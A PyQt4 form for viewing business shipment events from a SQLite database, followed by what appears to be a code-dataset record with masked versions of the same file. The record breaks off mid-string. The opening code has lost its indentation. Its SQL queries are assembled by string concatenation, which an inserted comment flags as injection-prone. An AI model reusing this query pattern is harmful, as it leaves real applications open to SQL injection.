query.exec_("Select * from BusinessEvents a, EventTypes b where b.Event = '" + text + "' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT " + str(self.eventSkip) + ",1")
        recCount = 0
while query.next():
recCount = recCount + 1
if query.value(2).toString() != '':
query_Origin = QtSql.QSqlQuery()
query_Origin.exec_("Select Name from Cities where ID = '" + query.value(2).toString() + "' LIMIT 1")
query_Origin.next()
modelInputItem = QtGui.QStandardItem("Origin")
modelInputValue = QtGui.QStandardItem(query_Origin.value(0).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(3).toString() != '':
query_Destination = QtSql.QSqlQuery()
query_Destination.exec_("Select Name from Cities where ID = '" + query.value(3).toString() + "' LIMIT 1")
query_Destination.next()
modelInputItem = QtGui.QStandardItem("Destination")
modelInputValue = QtGui.QStandardItem(query_Destination.value(0).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(4).toString() != '':
modelInputItem = QtGui.QStandardItem("Weight")
modelInputValue = QtGui.QStandardItem(query.value(4).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(5).toString() != '':
modelInputItem = QtGui.QStandardItem("Volume")
modelInputValue = QtGui.QStandardItem(query.value(5).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(6).toString() != '':
modelInputItem = QtGui.QStandardItem("Time of Entry")
modelInputValue = QtGui.QStandardItem(query.value(6).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(7).toString() != '':
modelInputItem = QtGui.QStandardItem("Priority")
modelInputValue = QtGui.QStandardItem(query.value(7).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(8).toString() != '':
modelInputItem = QtGui.QStandardItem("Price Per Gram")
modelInputValue = QtGui.QStandardItem(query.value(8).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(9).toString() != '':
modelInputItem = QtGui.QStandardItem("Price Per CC")
modelInputValue = QtGui.QStandardItem(query.value(9).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(10).toString() != '':
modelInputItem = QtGui.QStandardItem("Company")
modelInputValue = QtGui.QStandardItem(query.value(10).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(11).toString() != '':
modelInputItem = QtGui.QStandardItem("Transport Type")
modelInputValue = QtGui.QStandardItem(query.value(11).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(12).toString() != '':
modelInputItem = QtGui.QStandardItem("Day of the Week")
modelInputValue = QtGui.QStandardItem(query.value(12).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(13).toString() != '':
modelInputItem = QtGui.QStandardItem("Frequency")
modelInputValue = QtGui.QStandardItem(query.value(13).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(14).toString() != '':
modelInputItem = QtGui.QStandardItem("Duration")
modelInputValue = QtGui.QStandardItem(query.value(14).toString())
modelView.appendRow([modelInputItem,modelInputValue])
#modelInputValue = QtGui.QStandardItem('Value')
# modelView.appendRow([modelInputItem,modelInputValue])
if recCount == 0:
self.label_3.setText(_translate("Form", "No Records found", None))
self.inWork = False
else:
self.label_3.setText(_translate("Form", "", None))
self.inWork = True
self.tb_EventViewer.setModel(modelView)
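    # Editor's note (not part of the generated file): the SELECT above is built by
    # string concatenation, so the combo-box text is spliced straight into the SQL.
    # With the same QtSql API, a bound-parameter variant would look roughly like:
    #   query.prepare("Select * from BusinessEvents a, EventTypes b "
    #                 "where b.Event = ? and b.EventTypeID = a.EventTypeID "
    #                 "order by ID DESC LIMIT ?,1")
    #   query.addBindValue(text)
    #   query.addBindValue(self.eventSkip)
    #   query.exec_()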
def clicked_bt_Earlier(self):
self.eventSkip = self.eventSkip + 1
self.handleChanged(self.cb_EventType.currentText())
def clicked_bt_Later(self):
if self.eventSkip > 0:
self.eventSkip = self.eventSkip - 1
self.handleChanged(self.cb_EventType.currentText())
class Database:
def __init__(self, parent = None):
self.data = QtSql.QSqlDatabase.addDatabase("QSQLITE")
self.data.setDatabaseName("../Database/Business.db")
self.data.open()
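# Minimal usage sketch for the generated form, following the usual pyuic4
# pattern (editor's addition; assumes the module is run as a standalone script):
#   import sys
#   app = QtGui.QApplication(sys.argv)
#   window = QtGui.QWidget()
#   ui = Ui_Form()
#   ui.setupUi(window)
#   window.show()
#   sys.exit(app.exec_())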
|
normal
|
{
"blob_id": "8339113fd6b0c286cc48ec04e6e24978e2a4b44e",
"index": 9991,
"step-1": "<mask token>\n\n\nclass Ui_Form(object):\n\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8('Form'))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0\n self.db = Database()\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n self.inWork = True\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8('tb_EventViewer'))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8('bt_Earlier'))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8('bt_Later'))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText,\n brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI Light'))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8('label'))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8('cb_EventType'))\n self.cb_EventType.currentIndexChanged['QString'].connect(self.\n handleChanged)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n 
self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI'))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8('label_2'))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8('label_3'))\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate('Form', 'Revisit business events', None)\n )\n self.bt_Earlier.setText(_translate('Form', '<<', None))\n self.bt_Later.setText(_translate('Form', '>>', None))\n self.label.setText(_translate('Form', 'Revisit business events', None))\n self.label_2.setText(_translate('Form', 'Select Event Type', None))\n <mask token>\n\n def getBusinessEventsType(self):\n conn = sqlite3.connect('../Database/Business.db')\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n\n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n query.exec_(\n \"Select * from BusinessEvents a, EventTypes b where b.Event = '\" +\n text +\n \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" +\n str(self.eventSkip) + ',1')\n recCount = 0\n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" +\n query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem('Origin')\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0)\n .toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\n \"Select Name from Cities where ID = '\" + query.value(3)\n .toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem('Destination')\n modelInputValue = QtGui.QStandardItem(query_Destination.\n value(0).toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem('Weight')\n modelInputValue = QtGui.QStandardItem(query.value(4).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem('Volume')\n modelInputValue = QtGui.QStandardItem(query.value(5).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem('Time of Entry')\n modelInputValue = QtGui.QStandardItem(query.value(6).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = 
QtGui.QStandardItem('Priority')\n modelInputValue = QtGui.QStandardItem(query.value(7).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per Gram')\n modelInputValue = QtGui.QStandardItem(query.value(8).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per CC')\n modelInputValue = QtGui.QStandardItem(query.value(9).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem('Company')\n modelInputValue = QtGui.QStandardItem(query.value(10).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem('Transport Type')\n modelInputValue = QtGui.QStandardItem(query.value(11).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem('Day of the Week')\n modelInputValue = QtGui.QStandardItem(query.value(12).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem('Frequency')\n modelInputValue = QtGui.QStandardItem(query.value(13).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem('Duration')\n modelInputValue = QtGui.QStandardItem(query.value(14).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate('Form', 'No Records found', None))\n self.inWork = False\n else:\n self.label_3.setText(_translate('Form', '', None))\n self.inWork = True\n self.tb_EventViewer.setModel(modelView)\n\n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n <mask token>\n\n\nclass Database:\n\n def __init__(self, parent=None):\n self.data = QtSql.QSqlDatabase.addDatabase('QSQLITE')\n self.data.setDatabaseName('../Database/Business.db')\n self.data.open()\n",
"step-2": "<mask token>\n\n\nclass Ui_Form(object):\n\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8('Form'))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0\n self.db = Database()\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n self.inWork = True\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8('tb_EventViewer'))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8('bt_Earlier'))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8('bt_Later'))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText,\n brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI Light'))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8('label'))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8('cb_EventType'))\n self.cb_EventType.currentIndexChanged['QString'].connect(self.\n handleChanged)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n 
self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI'))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8('label_2'))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8('label_3'))\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate('Form', 'Revisit business events', None)\n )\n self.bt_Earlier.setText(_translate('Form', '<<', None))\n self.bt_Later.setText(_translate('Form', '>>', None))\n self.label.setText(_translate('Form', 'Revisit business events', None))\n self.label_2.setText(_translate('Form', 'Select Event Type', None))\n\n def initialize(self):\n self.cb_EventType.addItems(self.getBusinessEventsType())\n\n def getBusinessEventsType(self):\n conn = sqlite3.connect('../Database/Business.db')\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n\n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n query.exec_(\n \"Select * from BusinessEvents a, EventTypes b where b.Event = '\" +\n text +\n \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" +\n str(self.eventSkip) + ',1')\n recCount = 0\n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" +\n query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem('Origin')\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0)\n .toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\n \"Select Name from Cities where ID = '\" + query.value(3)\n .toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem('Destination')\n modelInputValue = QtGui.QStandardItem(query_Destination.\n value(0).toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem('Weight')\n modelInputValue = QtGui.QStandardItem(query.value(4).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem('Volume')\n modelInputValue = QtGui.QStandardItem(query.value(5).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem('Time of Entry')\n modelInputValue = QtGui.QStandardItem(query.value(6).toString()\n )\n modelView.appendRow([modelInputItem, 
modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem('Priority')\n modelInputValue = QtGui.QStandardItem(query.value(7).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per Gram')\n modelInputValue = QtGui.QStandardItem(query.value(8).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per CC')\n modelInputValue = QtGui.QStandardItem(query.value(9).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem('Company')\n modelInputValue = QtGui.QStandardItem(query.value(10).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem('Transport Type')\n modelInputValue = QtGui.QStandardItem(query.value(11).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem('Day of the Week')\n modelInputValue = QtGui.QStandardItem(query.value(12).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem('Frequency')\n modelInputValue = QtGui.QStandardItem(query.value(13).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem('Duration')\n modelInputValue = QtGui.QStandardItem(query.value(14).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate('Form', 'No Records found', None))\n self.inWork = False\n else:\n self.label_3.setText(_translate('Form', '', None))\n self.inWork = True\n self.tb_EventViewer.setModel(modelView)\n\n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n\n def clicked_bt_Later(self):\n if self.eventSkip > 0:\n self.eventSkip = self.eventSkip - 1\n self.handleChanged(self.cb_EventType.currentText())\n\n\nclass Database:\n\n def __init__(self, parent=None):\n self.data = QtSql.QSqlDatabase.addDatabase('QSQLITE')\n self.data.setDatabaseName('../Database/Business.db')\n self.data.open()\n",
"step-3": "<mask token>\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n\n def _fromUtf8(s):\n return s\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\n\nclass Ui_Form(object):\n\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8('Form'))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0\n self.db = Database()\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n self.inWork = True\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8('tb_EventViewer'))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8('bt_Earlier'))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8('bt_Later'))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText,\n brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI Light'))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n 
self.label.setObjectName(_fromUtf8('label'))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8('cb_EventType'))\n self.cb_EventType.currentIndexChanged['QString'].connect(self.\n handleChanged)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI'))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8('label_2'))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8('label_3'))\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate('Form', 'Revisit business events', None)\n )\n self.bt_Earlier.setText(_translate('Form', '<<', None))\n self.bt_Later.setText(_translate('Form', '>>', None))\n self.label.setText(_translate('Form', 'Revisit business events', None))\n self.label_2.setText(_translate('Form', 'Select Event Type', None))\n\n def initialize(self):\n self.cb_EventType.addItems(self.getBusinessEventsType())\n\n def getBusinessEventsType(self):\n conn = 